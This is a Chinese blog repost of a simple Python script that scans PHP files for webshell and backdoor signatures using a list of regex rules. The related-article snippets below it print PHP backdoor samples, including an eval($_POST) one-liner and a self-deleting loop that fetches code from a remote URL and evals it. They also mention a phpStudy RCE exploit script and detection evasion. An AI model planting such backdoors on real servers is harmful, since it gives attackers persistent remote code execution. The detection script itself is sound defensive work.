php后门简单检测脚本

最新推荐文章于 2022-05-31 19:55:36 发布
最新推荐文章于 2022-05-31 19:55:36 发布
阅读量588 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/whoami101/p/6288464.html
版权 
# coding:utf-8

import os
import sys
import re

rulelist = [
    '(\$_(GET|POST|REQUEST)\[.{0,15}\]\(\$_(GET|POST|REQUEST)\[.{0,15}\]\))',
    '(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))',
    'eval\(base64_decode\(',
    '(eval\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
    '(assert\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
    '(\$[\w_]{0,15}\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
    '(wscript\.shell)',
    '(gethostbyname\()',
    '(cmd\.exe)',
    '(shell\.application)',
    '(documents\s+and\s+settings)',
    '(system32)',
    '(serv-u)',
    '(提权)',
    '(phpspy)',
    '(后门)',
    '(webshell)',
    '(Program\s+Files)'
]

def Scan(path):
    for root,dirs,files in os.walk(path):
        for filespath in files:
            isover = False
            if '.' in filespath:
                ext = filespath[(filespath.rindex('.')+1):]
                if ext=='php':
                    file= open(os.path.join(root,filespath))
                    filestr = file.read()
                    file.close()
                    for rule in rulelist:
                        result = re.compile(rule).findall(filestr)
                        if result:
                            print '文件:'+os.path.join(root,filespath)
                            print '恶意代码:'+str(result[0])
                            print '\n\n'
                            break

if os.path.lexists(sys.argv[1]):
    print('\n\n开始扫描:'+sys.argv[1])
    print('               可疑文件                 ')
    print('########################################')
    Scan(sys.argv[1])
    print('提示:扫描完成-- O(∩_∩)O哈哈~')
else:
    print '提示:指定的扫描目录不存在---  我靠( \'o′)!!凸'

  

转载于:https://www.cnblogs.com/whoami101/p/6288464.html

weixin_34192993
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php后门查询工具
11-03
php源码修改工具,欢迎分享,有需要的下载把,请大家给个好评,谢谢了
php后门URL的防范
10-26
这通常发生在开发过程中,由于配置不当或疏忽,使得...通过实施这些策略,开发者可以显著降低PHP后门URL的风险,保护应用程序免受未经授权的访问和恶意活动的侵害。记住,安全是持续的过程,需要不断评估、更新和改进。
简单后门脚本 - iBackdoor v0.1 Options
weixin_34206899的博客
04-27 109
简单后门脚本 - iBackdoor v0.1 Options 一、Information 1、可用perl2exe转化为exe可执行文件; 2、支持多客户连接,默认监听端口为23; 3、提供一个简单的密码验证,默认密码为123456; 二、Source Code #!C:\Perl\bin\perl.exe #iBackdoor v0.1, by i_am_j...@ms...
php网站webshell检查脚本
一个人的安静
12-16 280
[size=medium]参考了一些别人写的脚本,自己用Python写的一个小脚本简单实用。学习Python为主。 1、检查你的php文件是否是webshell程序,也可以检查危险的函数。 2、可以检查图片文件,但是可能会有误报。[/size] [code="python"]#!/usr/bin/python #coding=utf-8 #程序描述:webshell检查工具 ...
无敌强大的Shell脚本查杀各种PHP后门和Webshell
海阔天空的专栏(web前端+LAMP)
07-10 1477
一句话查找PHP木马 # find ./ -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval(gunerpress|eval(base64_decoolcode|spider_bc))" > /tmp/php.txt # grep -r --include=*.php  '[^a-z]eval($_POST' . > /tmp...
后门查杀php专版,python版php web后门查杀小工具
weixin_42523720的博客
03-19 249
这两天帮客户做应急响应,由于是linux的系统,查找webshell的时候就自己写了个脚本,主要针对linux上webshell的查杀,也就是PHP,分享给大家,以后再慢慢完善吧。使用就只要传一个目录参数就OK了。#!/usr/bin/python# -*- coding: utf-8 -*-import osimport sysimport rerulelist = ['(\\$_(GET|PO...
phpstudy后门rce批量利用脚本的实现
01-21
写两个一个批量检测的 一个交互式shell的 暂时py 图形化的qt写出来..有点问题 后门包 : GET / HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/...
PHP-Nulled-Scanner:扫描PHP脚本中的后门和隐藏代码
05-28
PHP脚本扫描程序v2.2 该脚本试图检测从可疑来源下载PHP脚本中的后门和隐藏代码。 检查在不安全的脚本中发现的一些常见和不常见的字符串,这些字符串可能会导致广告,后门等。它使用递归grep搜索来输出可疑的文件名...
php万能后门程序
09-11
PHP后门是指一种特殊设计的PHP脚本,能够使攻击者在目标服务器上获得持久的、隐蔽的访问权限。这些后门通常是隐藏的,不易被安全扫描工具检测到。它们可以伪装成正常的功能模块,或者通过注入到现有的PHP文件中来...
常见php后门分析
W小哥
05-31 803
一、第一种 <?php define('test', 1); #定义一个常量 test,并且值为1 $test = $_POST[test];#因为前面定义了常量 test且值为1,而此处用了常量test:“$_POST[test]”,所以post传输数据必须为1,否则与前面定义的常量不一致,导致报错 if(test == 1){ @eval($test);#一句话木马后门 } 连接方式 二、第二种 ...
360webscan后门查杀php专版
04-18
自用的,360webscan后门查杀php专版,3个文件均能扫描,上传到网站根目录下运行
phpscan,php后门扫描神器
08-12
phpscan,php后门扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,里面附详细的使用说明
2019年php后门扫描文件
06-22
php后门扫描文件,下载该文件放到网站根目录,直接访问即可扫描
php在线查杀扫描webshell后门 对接WEBDIR+ Api
10-04
使用PHP对接百度 WebDir在线查杀接口 作者来源:https://mubaisu.com/webdir.html 并处理判断返回结果,使在线查杀文件不在是梦想~ 无需任何扩展和依赖限制 只要你服务器可以跑php 缺点:每次查杀都需要上传文件到WebDir 并等待返回结果 速度比较慢 需要耐心等待 优点:Api 免费 并且不限制上传文件数量。 WEBDIR+采用先进的动态监测技术,结合多种引擎零规则查杀,低误报、高查杀率。 Html Gui界面使用bootstrap 自适应
php后门拿下当前目录
aici0819的博客
03-26 375
Weevely是一个模拟类似telnet的连接的隐形PHP网页shell。它是Web应用程序后期开发的必备工具,可以作为隐形后门程序,也可以作为一个web外壳来管理合法的Web帐户,甚至可以免费托管。 weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似tel...
php做扫描功能,phpscanphp后门扫描神器
weixin_34307867的博客
03-21 1039
扫描备份工具 源码 ,python 实现, 扫描备份工具 源码 ,python 实现 扫描备份工具 源码 ,python 实现 扫描备份工具 源码 ,python 实现 扫描备份工具 源码 ,python 实现能针对PHP大马,PHP小马,PHP一句话,建网站PHP执行命令,UDF提权,SQL语句,COM组件调用,上传,怎样建网站越权,等后门进行扫描。 特点: 1.误报率极低。 2.兼容各种下,w...
php后门检测工具,phpStudy后门如何检测和修复
weixin_32331345的博客
03-09 1105
背景一篇《Phpstudy官网于2016年被入*,犯罪分子篡改软件并植入后门》让人触目惊心,从官网的下载官方安装包也会有问题,由此可想而知目前已经有多少网站已经沦陷。接到消息的第一时间,我们对以前从官网下载的一个安装包 phpStudySetup.exe 进行了检测,发现 md5=fc44101432b8c3a5140fcb18284d2797,果然也已经在涉及漏洞的列表中。来自文章的原话:”据主...
一猥琐的PHP后门分析
橙虚缘空间
04-18 1135
Webshell代码如下:&lt;?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*...
捡了一个非常淫荡的PHP后门,给跪了
weixin_30606461的博客
01-23 2853
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep...
PHP Webshell检测绕过技术探索
本文主要关注的是如何绕过现有的PHP Webshell检测工具和平台,以实现更隐蔽的PHP Webshell,即“零提示、无警告、无法被检测到的一句话木马后门”。 首先,我们要了解Webshell的基本概念。Webshell,又称为网站后门...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值